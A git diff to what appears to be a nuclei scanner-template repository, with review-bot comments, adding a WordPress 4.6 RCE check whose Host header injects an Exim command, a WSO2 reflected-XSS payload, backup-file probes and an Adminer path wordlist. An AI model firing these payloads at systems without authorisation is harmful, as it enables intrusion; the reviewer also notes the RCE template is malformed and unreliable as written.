diff --git a/README.md b/README.md index a5d0c6fb0a..26f449abad 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 252 | vulnerabilities | 116 | exposed-panels | 108 | -| takeovers | 65 | exposures | 63 | technologies | 51 | +| cves | 254 | vulnerabilities | 117 | exposed-panels | 108 | +| takeovers | 65 | exposures | 64 | technologies | 51 | | misconfiguration | 54 | workflows | 24 | miscellaneous | 16 | | default-logins | 20 | exposed-tokens | 9 | dns | 8 | -| fuzzing | 5 | helpers | 3 | iot | 7 | +| fuzzing | 6 | helpers | 4 | iot | 7 | -**79 directories, 827 files**. +**79 directories, 833 files**. diff --git a/cves/2016/CVE-2016-10033.yaml b/cves/2016/CVE-2016-10033.yaml new file mode 100644 index 0000000000..cdae3cc13f --- /dev/null +++ b/cves/2016/CVE-2016-10033.yaml 
@@ -0,0 +1,50 @@ +id: CVE-2016-10033 +info: + name: Wordpress 4.6 Remote Code Execution + author: princechaddha + severity: high + reference: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html + tags: wordpress,cve,cve2016,rce + +requests: + - raw: + - |+ + GET /?author=1 HTTP/1.1 + Host: {{Hostname}} + Cache-Control: max-age=0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Language: en-US,en;q=0.9 + Connection: close + + - |+ + POST /wp-login.php?action=lostpassword HTTP/1.1 + Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null) + Connection: close + User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) + Accept: */* + Content-Length: 56 + Content-Type: application/x-www-form-urlencoded + + wp-submit=Get+New+Password&redirect_to=&user_login={{username}} + + unsafe: true + extractors: + - type: regex + name: username + internal: true + group: 1 + part: body + regex: + - 'Author:(?:[A-Za-z0-9 -\_="]+)?" + - "passwd" + condition: and + part: body + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2020/CVE-2020-17453.yaml b/cves/2020/CVE-2020-17453.yaml new file mode 100644 index 0000000000..e6409d3a14 --- /dev/null +++ b/cves/2020/CVE-2020-17453.yaml 
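Review bot: The extractor regex `'Author:(?:[A-Za-z0-9 -\_="]+)?"` opens with a single quote and closes with a double quote, so it is not a valid YAML scalar, and its only group is non-capturing (`(?:`), so `group: 1` can never produce a value and `{{username}}` in the POST body is left unresolved; the quotes must agree and the group must capture, e.g. `- 'Author:([A-Za-z0-9 -\_="]+)?'`. The `- "passwd"` / `condition: and` / `part: body` lines that follow read like the `words:` of a `- type: word` matcher whose `matchers-condition:`, `matchers:` and `- type: word` lines are missing, so the file is unlikely to load as written. `Content-Length: 56` is hard-coded although the body length varies with the extracted username. Separately, the request is `unsafe: true` and the injected Host header creates a file on the target, which the `info` block should state explicitly so operators know this check has a side effect rather than being a passive probe.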
@@ -0,0 +1,29 @@ +id: CVE-2020-17453 + +info: + name: WSO2 Carbon Management Console - XSS + author: madrobot + severity: medium + description: Reflected XSS vulnerability can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests. + tags: xss,wso2,cve2020 + # https://www.shodan.io/search?query=Server%3A+WSO2+Carbon+Server + +requests: + - method: GET + path: + - '{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "'';alert('nuclei')//';" + part: body + + - type: word + words: + - "text/html" + part: header diff --git a/exposed-panels/crxde.yaml b/exposed-panels/crxde-lite.yaml similarity index 93% rename from exposed-panels/crxde.yaml rename to exposed-panels/crxde-lite.yaml index 81e66661bc..36bd50be83 100644 --- a/exposed-panels/crxde.yaml +++ b/exposed-panels/crxde-lite.yaml @@ -1,4 +1,4 @@ -id: crxde +id: crxde-lite info: name: CRXDE Lite diff --git a/exposed-panels/gitlab-detect.yaml b/exposed-panels/gitlab-detect.yaml index 5900c52769..e91e5c1eeb 100644 --- a/exposed-panels/gitlab-detect.yaml +++ b/exposed-panels/gitlab-detect.yaml @@ -9,14 +9,16 @@ requests: - method: GET path: - "{{BaseURL}}/users/sign_in" - - "{{BaseURL}}/users/sign_up" - - "{{BaseURL}}/explore" redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word words: - - "GitLab" - - "Register for GitLab" - - "Explore GitLab" + - 'GitLab' + - 'https://about.gitlab.com' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/exposures/apis/openapi.yaml b/exposures/apis/openapi.yaml index dc6f1590c7..8d7995c92a 100644 --- a/exposures/apis/openapi.yaml +++ b/exposures/apis/openapi.yaml @@ -4,6 +4,7 @@ info: name: OpenAPI author: pdteam severity: info + tags: api requests: - method: GET 
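Review bot: The `tags:` line reads `xss,wso2,cve2020` and omits the `cve` tag that the other CVE template in this commit (`cves/2016/CVE-2016-10033.yaml`, `tags: wordpress,cve,cve2016,rce`) carries, so a run filtered on `cve` would skip this one; `tags: cve,cve2020,xss,wso2` keeps the convention. The Shodan query is left in a YAML comment below `tags:` where tooling will not surface it; it would be more discoverable as a second `reference:` entry next to a pointer to the CVE record.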
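Review bot: The rewritten word matcher in `exposed-panels/gitlab-detect.yaml` lists `'GitLab'` and `'https://about.gitlab.com'` without a `condition:`, so the default `or` applies and any page that merely links to GitLab's site or mentions the name satisfies it; the removed `Register for GitLab` / `Explore GitLab` strings were at least sign-in-page specific. Add `condition: and` under `words:` so both tokens must be present, or keep one sign-in-page phrase in the list. The added `matchers-condition: and` with the 200 status check is sound but does not compensate for the looser word match, since most pages that link to GitLab also return 200.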
diff --git a/exposures/apis/swagger-api.yaml b/exposures/apis/swagger-api.yaml index 19332c6a4e..29be15e816 100644 --- a/exposures/apis/swagger-api.yaml +++ b/exposures/apis/swagger-api.yaml @@ -1,9 +1,10 @@ id: swagger-api info: - name: Swagger API - author: pd-team + name: Public Swagger API + author: pdteam severity: info + tags: api,swagger requests: - method: GET diff --git a/exposures/apis/wadl-api.yaml b/exposures/apis/wadl-api.yaml index adf4433d25..94c70ca79a 100644 --- a/exposures/apis/wadl-api.yaml +++ b/exposures/apis/wadl-api.yaml @@ -4,6 +4,7 @@ info: name: wadl file disclosure author: 0xrudra & manuelbua severity: info + tags: api # References: # - https://github.com/dwisiswant0/wadl-dumper diff --git a/exposures/apis/wsdl-api.yaml b/exposures/apis/wsdl-api.yaml index 44d7f7b49a..df3a326bcb 100644 --- a/exposures/apis/wsdl-api.yaml +++ b/exposures/apis/wsdl-api.yaml @@ -4,6 +4,7 @@ info: name: wsdl-detect author: jarijaas severity: info + tags: api # This detects web services that have WSDL (https://www.w3.org/TR/wsdl/) # For instance, SOAP services, such as: https://docs.microsoft.com/en-us/xamarin/xamarin-forms/data-cloud/web-services/asmx diff --git a/exposures/backups/settings-php-files.yaml b/exposures/backups/settings-php-files.yaml new file mode 100644 index 0000000000..9c5be63cd5 --- /dev/null +++ b/exposures/backups/settings-php-files.yaml @@ -0,0 +1,29 @@ +id: settings-php-files + +info: + name: settings.php information disclosure + author: sheikhrishad + severity: medium + tags: backup + +requests: + - method: GET + path: + - "{{BaseURL}}/settings.php.bak" + - "{{BaseURL}}/settings.php.dist" + - "{{BaseURL}}/settings.php.old" + - "{{BaseURL}}/settings.php.save" + - "{{BaseURL}}/settings.php.swp" + - "{{BaseURL}}/settings.php.txt" + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB" + condition: and + + - type: status + status: + - 200 \ No newline at end of file 
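Review bot: In the word matcher of `exposures/backups/settings-php-files.yaml`, `DB` is a substring of `DB_NAME`, so `condition: and` over `"DB_NAME"` and `"DB"` is equivalent to matching `DB_NAME` alone and the second entry adds no precision. Either drop `"DB"` or replace it with an independent token that a leaked settings file would contain and a generic error page would not. `DB_NAME` is typically the WordPress `wp-config.php` constant; nothing in this file establishes that the `settings.php` variants it probes use it, so the `info.name` or a comment should say which application's settings file is targeted.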
diff --git a/exposures/backups/sql-dump.yaml b/exposures/backups/sql-dump.yaml index 424ea48ab7..1768459cae 100644 --- a/exposures/backups/sql-dump.yaml +++ b/exposures/backups/sql-dump.yaml @@ -4,6 +4,7 @@ info: name: MySQL Dump Files author: geeknik & @dwisiswant0 severity: medium + tags: backup requests: - method: GET diff --git a/exposures/backups/zip-backup-files.yaml b/exposures/backups/zip-backup-files.yaml index 5faaea01e7..23d1d46fc0 100644 --- a/exposures/backups/zip-backup-files.yaml +++ b/exposures/backups/zip-backup-files.yaml @@ -4,6 +4,7 @@ info: name: Compressed Web File author: Toufik Airane & @dwisiswant0 severity: medium + tags: backup requests: - method: GET diff --git a/fuzzing/adminer-panel-fuzz.yaml b/fuzzing/adminer-panel-fuzz.yaml new file mode 100644 index 0000000000..17229354b9 --- /dev/null +++ b/fuzzing/adminer-panel-fuzz.yaml @@ -0,0 +1,46 @@ +id: adminer-panel-fuzz +info: + name: Adminer Login Panel Fuzz + author: random-robbie & meme-lord + severity: info + reference: https://blog.sorcery.ie/posts/adminer/ + tags: fuzz,adminer + + # <= 4.2.4 can have unauthenticated RCE via SQLite driver + # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL + # Most versions have some kind of SSRF usability + # Is generally handy if you find SQL creds + +requests: + + - payloads: + path: helpers/wordlists/adminer-paths.txt + + attack: sniper + threads: 50 + + raw: + - | + GET {{path}} HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Accept-Language: en-US,en;q=0.5 + Referer: {{BaseURL}} + + matchers-condition: and + matchers: + + - type: word + words: + - "Login - Adminer" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '([0-9.]+)' diff --git a/helpers/wordlists/adminer-paths.txt b/helpers/wordlists/adminer-paths.txt new file mode 100644 index 0000000000..602d7b2d27 --- /dev/null +++ b/helpers/wordlists/adminer-paths.txt 
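Review bot: The extractor regex `'([0-9.]+)'` over `part: body` with `group: 1` in `fuzzing/adminer-panel-fuzz.yaml` captures the first run of digits and dots anywhere in the response (a doctype, a CSS version query string, an IP address), not specifically the Adminer version, so the extracted value is unreliable; anchor it to the markup around the version string on the login page (constructed example, verify against a real response: `'Adminer</a> <span class="version">([0-9.]+)'`) and give the extractor a `name:`. `threads: 50` combined with a 741-entry wordlist is a heavy default for an `info`-severity template; a lower value, or a comment explaining the choice, would help operators tune it.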
@@ -0,0 +1,741 @@ +/_adminer.php +/adm.php +/admin/adminer.php +/adminer-2.0.0.php +/adminer-2.1.0.php +/adminer-2.2.0.php +/adminer-2.2.1.php +/adminer-2.3.0.php +/adminer-2.3.2.php +/adminer-3.0.0.php +/adminer-3.0.1-en.php +/adminer-3.0.1-mysql-en.php +/adminer-3.0.1-mysql.php +/adminer-3.0.1.php +/adminer-3.0.1/ +/adminer-3.1.0-en.php +/adminer-3.1.0-mysql-en.php +/adminer-3.1.0-mysql.php +/adminer-3.1.0.php +/adminer-3.1.0/ +/adminer-3.2.0-en.php +/adminer-3.2.0-mysql-en.php +/adminer-3.2.0-mysql.php +/adminer-3.2.0.php +/adminer-3.2.0/ +/adminer-3.2.1.php +/adminer-3.2.2-en.php +/adminer-3.2.2-mysql-en.php +/adminer-3.2.2-mysql.php +/adminer-3.2.2.php +/adminer-3.2.2/ +/adminer-3.3.0-en.php +/adminer-3.3.0-mysql-en.php +/adminer-3.3.0-mysql.php +/adminer-3.3.0.php +/adminer-3.3.0/ +/adminer-3.3.1-en.php +/adminer-3.3.1-mysql-en.php +/adminer-3.3.1-mysql.php +/adminer-3.3.1.php +/adminer-3.3.1/ +/adminer-3.3.2.php +/adminer-3.3.3-en.php +/adminer-3.3.3-mysql-en.php +/adminer-3.3.3-mysql.php +/adminer-3.3.3.php +/adminer-3.3.3/ +/adminer-3.3.4-en.php +/adminer-3.3.4-mysql-en.php +/adminer-3.3.4-mysql.php +/adminer-3.3.4.php +/adminer-3.3.4/ +/adminer-3.4.0-en.php +/adminer-3.4.0-mysql-en.php +/adminer-3.4.0-mysql.php +/adminer-3.4.0.php +/adminer-3.4.0/ +/adminer-3.5.0.php +/adminer-3.5.1-en.php +/adminer-3.5.1-mysql-en.php +/adminer-3.5.1-mysql.php +/adminer-3.5.1.php +/adminer-3.5.1/ +/adminer-3.6.0.php +/adminer-3.6.1-en.php +/adminer-3.6.1-mysql-en.php +/adminer-3.6.1-mysql.php +/adminer-3.6.1.php +/adminer-3.6.1/ +/adminer-3.6.2-en.php +/adminer-3.6.2-mysql-en.php +/adminer-3.6.2-mysql.php +/adminer-3.6.2.php +/adminer-3.6.2/ +/adminer-3.6.3-en.php +/adminer-3.6.3-mysql-en.php +/adminer-3.6.3-mysql.php +/adminer-3.6.3.php +/adminer-3.6.3/ +/adminer-3.6.4-en.php +/adminer-3.6.4-mysql-en.php +/adminer-3.6.4-mysql.php +/adminer-3.6.4.php +/adminer-3.6.4/ +/adminer-3.7.0-en.php +/adminer-3.7.0-mysql-en.php +/adminer-3.7.0-mysql.php +/adminer-3.7.0.php 
+/adminer-3.7.0/ +/adminer-3.7.1-en.php +/adminer-3.7.1-mysql-en.php +/adminer-3.7.1-mysql.php +/adminer-3.7.1.php +/adminer-3.7.1/ +/adminer-4.0.0.php +/adminer-4.0.1-en.php +/adminer-4.0.1-mysql-en.php +/adminer-4.0.1-mysql.php +/adminer-4.0.1.php +/adminer-4.0.1/ +/adminer-4.0.2-en.php +/adminer-4.0.2-mysql-en.php +/adminer-4.0.2-mysql.php +/adminer-4.0.2.php +/adminer-4.0.2/ +/adminer-4.0.3-en.php +/adminer-4.0.3-mysql-en.php +/adminer-4.0.3-mysql.php +/adminer-4.0.3.php +/adminer-4.0.3/ +/adminer-4.1.0-en.php +/adminer-4.1.0-mysql-en.php +/adminer-4.1.0-mysql.php +/adminer-4.1.0.php +/adminer-4.1.0/ +/adminer-4.2.0-en.php +/adminer-4.2.0-mysql-en.php +/adminer-4.2.0-mysql.php +/adminer-4.2.0.php +/adminer-4.2.0/ +/adminer-4.2.1-en.php +/adminer-4.2.1-mysql-en.php +/adminer-4.2.1-mysql.php +/adminer-4.2.1.php +/adminer-4.2.1/ +/adminer-4.2.2-en.php +/adminer-4.2.2-mysql-en.php +/adminer-4.2.2-mysql.php +/adminer-4.2.2.php +/adminer-4.2.2/ +/adminer-4.2.3-en.php +/adminer-4.2.3-mysql-en.php +/adminer-4.2.3-mysql.php +/adminer-4.2.3.php +/adminer-4.2.3/ +/adminer-4.2.4-en.php +/adminer-4.2.4-mysql-en.php +/adminer-4.2.4-mysql.php +/adminer-4.2.4.php +/adminer-4.2.4/ +/adminer-4.2.5-cs.php +/adminer-4.2.5-de.php +/adminer-4.2.5-en.php +/adminer-4.2.5-mysql-cs.php +/adminer-4.2.5-mysql-de.php +/adminer-4.2.5-mysql-en.php +/adminer-4.2.5-mysql-pl.php +/adminer-4.2.5-mysql-sk.php +/adminer-4.2.5-mysql.php +/adminer-4.2.5-pl.php +/adminer-4.2.5-sk.php +/adminer-4.2.5.php +/adminer-4.2.5/ +/adminer-4.3.0-cs.php +/adminer-4.3.0-de.php +/adminer-4.3.0-en.php +/adminer-4.3.0-mysql-cs.php +/adminer-4.3.0-mysql-de.php +/adminer-4.3.0-mysql-en.php +/adminer-4.3.0-mysql-pl.php +/adminer-4.3.0-mysql-sk.php +/adminer-4.3.0-mysql.php +/adminer-4.3.0-pl.php +/adminer-4.3.0-sk.php +/adminer-4.3.0.php +/adminer-4.3.0/ +/adminer-4.3.1-cs.php +/adminer-4.3.1-de.php +/adminer-4.3.1-en.php +/adminer-4.3.1-mysql-cs.php +/adminer-4.3.1-mysql-de.php +/adminer-4.3.1-mysql-en.php 
+/adminer-4.3.1-mysql-pl.php +/adminer-4.3.1-mysql-sk.php +/adminer-4.3.1-mysql.php +/adminer-4.3.1-pl.php +/adminer-4.3.1-sk.php +/adminer-4.3.1.php +/adminer-4.3.1/ +/adminer-4.4.0-cs.php +/adminer-4.4.0-de.php +/adminer-4.4.0-en.php +/adminer-4.4.0-mysql-cs.php +/adminer-4.4.0-mysql-de.php +/adminer-4.4.0-mysql-en.php +/adminer-4.4.0-mysql-pl.php +/adminer-4.4.0-mysql-sk.php +/adminer-4.4.0-mysql.php +/adminer-4.4.0-pl.php +/adminer-4.4.0-sk.php +/adminer-4.4.0.php +/adminer-4.4.0/ +/adminer-4.5.0-cs.php +/adminer-4.5.0-de.php +/adminer-4.5.0-en.php +/adminer-4.5.0-mysql-cs.php +/adminer-4.5.0-mysql-de.php +/adminer-4.5.0-mysql-en.php +/adminer-4.5.0-mysql-pl.php +/adminer-4.5.0-mysql-sk.php +/adminer-4.5.0-mysql.php +/adminer-4.5.0-pl.php +/adminer-4.5.0-sk.php +/adminer-4.5.0.php +/adminer-4.5.0/ +/adminer-4.6.0-cs.php +/adminer-4.6.0-de.php +/adminer-4.6.0-en.php +/adminer-4.6.0-mysql-cs.php +/adminer-4.6.0-mysql-de.php +/adminer-4.6.0-mysql-en.php +/adminer-4.6.0-mysql-pl.php +/adminer-4.6.0-mysql-sk.php +/adminer-4.6.0-mysql.php +/adminer-4.6.0-pl.php +/adminer-4.6.0-sk.php +/adminer-4.6.0.php +/adminer-4.6.0/ +/adminer-4.6.1-cs.php +/adminer-4.6.1-de.php +/adminer-4.6.1-en.php +/adminer-4.6.1-mysql-cs.php +/adminer-4.6.1-mysql-de.php +/adminer-4.6.1-mysql-en.php +/adminer-4.6.1-mysql-pl.php +/adminer-4.6.1-mysql-sk.php +/adminer-4.6.1-mysql.php +/adminer-4.6.1-pl.php +/adminer-4.6.1-sk.php +/adminer-4.6.1.php +/adminer-4.6.1/ +/adminer-4.6.2-cs.php +/adminer-4.6.2-de.php +/adminer-4.6.2-en.php +/adminer-4.6.2-mysql-cs.php +/adminer-4.6.2-mysql-de.php +/adminer-4.6.2-mysql-en.php +/adminer-4.6.2-mysql-pl.php +/adminer-4.6.2-mysql-sk.php +/adminer-4.6.2-mysql.php +/adminer-4.6.2-pl.php +/adminer-4.6.2-sk.php +/adminer-4.6.2.php +/adminer-4.6.2/ +/adminer-4.6.3-cs.php +/adminer-4.6.3-de.php +/adminer-4.6.3-en.php +/adminer-4.6.3-mysql-cs.php +/adminer-4.6.3-mysql-de.php +/adminer-4.6.3-mysql-en.php +/adminer-4.6.3-mysql-pl.php +/adminer-4.6.3-mysql-sk.php 
+/adminer-4.6.3-mysql.php +/adminer-4.6.3-pl.php +/adminer-4.6.3-sk.php +/adminer-4.6.3.php +/adminer-4.6.3/ +/adminer-4.7.0-cs.php +/adminer-4.7.0-de.php +/adminer-4.7.0-en.php +/adminer-4.7.0-mysql-cs.php +/adminer-4.7.0-mysql-de.php +/adminer-4.7.0-mysql-en.php +/adminer-4.7.0-mysql-pl.php +/adminer-4.7.0-mysql-sk.php +/adminer-4.7.0-mysql.php +/adminer-4.7.0-pl.php +/adminer-4.7.0-sk.php +/adminer-4.7.0.php +/adminer-4.7.0/ +/adminer-4.7.1-cs.php +/adminer-4.7.1-de.php +/adminer-4.7.1-en.php +/adminer-4.7.1-mysql-cs.php +/adminer-4.7.1-mysql-de.php +/adminer-4.7.1-mysql-en.php +/adminer-4.7.1-mysql-pl.php +/adminer-4.7.1-mysql-sk.php +/adminer-4.7.1-mysql.php +/adminer-4.7.1-pl.php +/adminer-4.7.1-sk.php +/adminer-4.7.1.php +/adminer-4.7.1/ +/adminer-4.7.2-cs.php +/adminer-4.7.2-de.php +/adminer-4.7.2-en.php +/adminer-4.7.2-mysql-cs.php +/adminer-4.7.2-mysql-de.php +/adminer-4.7.2-mysql-en.php +/adminer-4.7.2-mysql-pl.php +/adminer-4.7.2-mysql-sk.php +/adminer-4.7.2-mysql.php +/adminer-4.7.2-pl.php +/adminer-4.7.2-sk.php +/adminer-4.7.2.php +/adminer-4.7.2/ +/adminer-4.7.3-cs.php +/adminer-4.7.3-de.php +/adminer-4.7.3-en.php +/adminer-4.7.3-mysql-cs.php +/adminer-4.7.3-mysql-de.php +/adminer-4.7.3-mysql-en.php +/adminer-4.7.3-mysql-pl.php +/adminer-4.7.3-mysql-sk.php +/adminer-4.7.3-mysql.php +/adminer-4.7.3-pl.php +/adminer-4.7.3-sk.php +/adminer-4.7.3.php +/adminer-4.7.3/ +/adminer-4.7.4-cs.php +/adminer-4.7.4-de.php +/adminer-4.7.4-en.php +/adminer-4.7.4-mysql-cs.php +/adminer-4.7.4-mysql-de.php +/adminer-4.7.4-mysql-en.php +/adminer-4.7.4-mysql-pl.php +/adminer-4.7.4-mysql-sk.php +/adminer-4.7.4-mysql.php +/adminer-4.7.4-pl.php +/adminer-4.7.4-sk.php +/adminer-4.7.4.php +/adminer-4.7.4/ +/adminer-4.7.5-cs.php +/adminer-4.7.5-de.php +/adminer-4.7.5-en.php +/adminer-4.7.5-mysql-cs.php +/adminer-4.7.5-mysql-de.php +/adminer-4.7.5-mysql-en.php +/adminer-4.7.5-mysql-pl.php +/adminer-4.7.5-mysql-sk.php +/adminer-4.7.5-mysql.php +/adminer-4.7.5-pl.php 
+/adminer-4.7.5-sk.php +/adminer-4.7.5.php +/adminer-4.7.5/ +/adminer-4.7.6-cs.php +/adminer-4.7.6-de.php +/adminer-4.7.6-en.php +/adminer-4.7.6-mysql-cs.php +/adminer-4.7.6-mysql-de.php +/adminer-4.7.6-mysql-en.php +/adminer-4.7.6-mysql-pl.php +/adminer-4.7.6-mysql-sk.php +/adminer-4.7.6-mysql.php +/adminer-4.7.6-pl.php +/adminer-4.7.6-sk.php +/adminer-4.7.6.php +/adminer-4.7.6/ +/adminer-4.7.7-cs.php +/adminer-4.7.7-de.php +/adminer-4.7.7-en.php +/adminer-4.7.7-mysql-cs.php +/adminer-4.7.7-mysql-de.php +/adminer-4.7.7-mysql-en.php +/adminer-4.7.7-mysql-pl.php +/adminer-4.7.7-mysql-sk.php +/adminer-4.7.7-mysql.php +/adminer-4.7.7-pl.php +/adminer-4.7.7-sk.php +/adminer-4.7.7.php +/adminer-4.7.7/ +/adminer-4.7.8-cs.php +/adminer-4.7.8-de.php +/adminer-4.7.8-en.php +/adminer-4.7.8-mysql-cs.php +/adminer-4.7.8-mysql-de.php +/adminer-4.7.8-mysql-en.php +/adminer-4.7.8-mysql-pl.php +/adminer-4.7.8-mysql-sk.php +/adminer-4.7.8-mysql.php +/adminer-4.7.8-pl.php +/adminer-4.7.8-sk.php +/adminer-4.7.8.php +/adminer-4.7.8/ +/adminer-4.7.9-cs.php +/adminer-4.7.9-de.php +/adminer-4.7.9-en.php +/adminer-4.7.9-mysql-cs.php +/adminer-4.7.9-mysql-de.php +/adminer-4.7.9-mysql-en.php +/adminer-4.7.9-mysql-pl.php +/adminer-4.7.9-mysql-sk.php +/adminer-4.7.9-mysql.php +/adminer-4.7.9-pl.php +/adminer-4.7.9-sk.php +/adminer-4.7.9.php +/adminer-4.7.9/ +/adminer-4.8.0-cs.php +/adminer-4.8.0-de.php +/adminer-4.8.0-en.php +/adminer-4.8.0-mysql-cs.php +/adminer-4.8.0-mysql-de.php +/adminer-4.8.0-mysql-en.php +/adminer-4.8.0-mysql-pl.php +/adminer-4.8.0-mysql-sk.php +/adminer-4.8.0-mysql.php +/adminer-4.8.0-pl.php +/adminer-4.8.0-sk.php +/adminer-4.8.0.php +/adminer-4.8.0/ +/adminer-mysql.php +/adminer.php +/adminer/ +/adminer/adminer.php +/adminer1.php +/data/adminer.php +/editor-3.0.1-mysql-en.php +/editor-3.0.1-mysql.php +/editor-3.0.1.php +/editor-3.1.0-mysql-en.php +/editor-3.1.0-mysql.php +/editor-3.1.0.php +/editor-3.2.0-mysql-en.php +/editor-3.2.0-mysql.php +/editor-3.2.0.php 
+/editor-3.2.2-mysql-en.php +/editor-3.2.2-mysql.php +/editor-3.2.2.php +/editor-3.3.0-mysql-en.php +/editor-3.3.0-mysql.php +/editor-3.3.0.php +/editor-3.3.1-mysql-en.php +/editor-3.3.1-mysql.php +/editor-3.3.1.php +/editor-3.3.3-mysql-en.php +/editor-3.3.3-mysql.php +/editor-3.3.3.php +/editor-3.3.4-mysql-en.php +/editor-3.3.4-mysql.php +/editor-3.3.4.php +/editor-3.4.0-mysql-en.php +/editor-3.4.0-mysql.php +/editor-3.4.0.php +/editor-3.5.1-mysql-en.php +/editor-3.5.1-mysql.php +/editor-3.5.1.php +/editor-3.6.1-mysql-en.php +/editor-3.6.1-mysql.php +/editor-3.6.1.php +/editor-3.6.2-mysql-en.php +/editor-3.6.2-mysql.php +/editor-3.6.2.php +/editor-3.6.3-mysql-en.php +/editor-3.6.3-mysql.php +/editor-3.6.3.php +/editor-3.6.4-mysql-en.php +/editor-3.6.4-mysql.php +/editor-3.6.4.php +/editor-3.7.0-mysql-en.php +/editor-3.7.0-mysql.php +/editor-3.7.0.php +/editor-3.7.1-mysql-en.php +/editor-3.7.1-mysql.php +/editor-3.7.1.php +/editor-4.0.1-en.php +/editor-4.0.1-mysql-en.php +/editor-4.0.1-mysql.php +/editor-4.0.1.php +/editor-4.0.2-en.php +/editor-4.0.2-mysql-en.php +/editor-4.0.2-mysql.php +/editor-4.0.2.php +/editor-4.0.3-en.php +/editor-4.0.3-mysql-en.php +/editor-4.0.3-mysql.php +/editor-4.0.3.php +/editor-4.1.0-en.php +/editor-4.1.0-mysql-en.php +/editor-4.1.0-mysql.php +/editor-4.1.0.php +/editor-4.2.0-en.php +/editor-4.2.0-mysql-en.php +/editor-4.2.0-mysql.php +/editor-4.2.0.php +/editor-4.2.1-en.php +/editor-4.2.1-mysql-en.php +/editor-4.2.1-mysql.php +/editor-4.2.1.php +/editor-4.2.2-en.php +/editor-4.2.2-mysql-en.php +/editor-4.2.2-mysql.php +/editor-4.2.2.php +/editor-4.2.3-en.php +/editor-4.2.3-mysql-en.php +/editor-4.2.3-mysql.php +/editor-4.2.3.php +/editor-4.2.4-en.php +/editor-4.2.4-mysql-en.php +/editor-4.2.4-mysql.php +/editor-4.2.4.php +/editor-4.2.5-cs.php +/editor-4.2.5-de.php +/editor-4.2.5-en.php +/editor-4.2.5-mysql-cs.php +/editor-4.2.5-mysql-de.php +/editor-4.2.5-mysql-en.php +/editor-4.2.5-mysql-pl.php +/editor-4.2.5-mysql-sk.php 
+/editor-4.2.5-mysql.php +/editor-4.2.5-pl.php +/editor-4.2.5-sk.php +/editor-4.2.5.php +/editor-4.3.0-cs.php +/editor-4.3.0-de.php +/editor-4.3.0-en.php +/editor-4.3.0-mysql-cs.php +/editor-4.3.0-mysql-de.php +/editor-4.3.0-mysql-en.php +/editor-4.3.0-mysql-pl.php +/editor-4.3.0-mysql-sk.php +/editor-4.3.0-mysql.php +/editor-4.3.0-pl.php +/editor-4.3.0-sk.php +/editor-4.3.0.php +/editor-4.3.1-cs.php +/editor-4.3.1-de.php +/editor-4.3.1-en.php +/editor-4.3.1-mysql-cs.php +/editor-4.3.1-mysql-de.php +/editor-4.3.1-mysql-en.php +/editor-4.3.1-mysql-pl.php +/editor-4.3.1-mysql-sk.php +/editor-4.3.1-mysql.php +/editor-4.3.1-pl.php +/editor-4.3.1-sk.php +/editor-4.3.1.php +/editor-4.4.0-cs.php +/editor-4.4.0-de.php +/editor-4.4.0-en.php +/editor-4.4.0-mysql-cs.php +/editor-4.4.0-mysql-de.php +/editor-4.4.0-mysql-en.php +/editor-4.4.0-mysql-pl.php +/editor-4.4.0-mysql-sk.php +/editor-4.4.0-mysql.php +/editor-4.4.0-pl.php +/editor-4.4.0-sk.php +/editor-4.4.0.php +/editor-4.5.0-cs.php +/editor-4.5.0-de.php +/editor-4.5.0-en.php +/editor-4.5.0-mysql-cs.php +/editor-4.5.0-mysql-de.php +/editor-4.5.0-mysql-en.php +/editor-4.5.0-mysql-pl.php +/editor-4.5.0-mysql-sk.php +/editor-4.5.0-mysql.php +/editor-4.5.0-pl.php +/editor-4.5.0-sk.php +/editor-4.5.0.php +/editor-4.6.0-cs.php +/editor-4.6.0-de.php +/editor-4.6.0-en.php +/editor-4.6.0-mysql-cs.php +/editor-4.6.0-mysql-de.php +/editor-4.6.0-mysql-en.php +/editor-4.6.0-mysql-pl.php +/editor-4.6.0-mysql-sk.php +/editor-4.6.0-mysql.php +/editor-4.6.0-pl.php +/editor-4.6.0-sk.php +/editor-4.6.0.php +/editor-4.6.1-cs.php +/editor-4.6.1-de.php +/editor-4.6.1-en.php +/editor-4.6.1-mysql-cs.php +/editor-4.6.1-mysql-de.php +/editor-4.6.1-mysql-en.php +/editor-4.6.1-mysql-pl.php +/editor-4.6.1-mysql-sk.php +/editor-4.6.1-mysql.php +/editor-4.6.1-pl.php +/editor-4.6.1-sk.php +/editor-4.6.1.php +/editor-4.6.2-cs.php +/editor-4.6.2-de.php +/editor-4.6.2-en.php +/editor-4.6.2-mysql-cs.php +/editor-4.6.2-mysql-de.php 
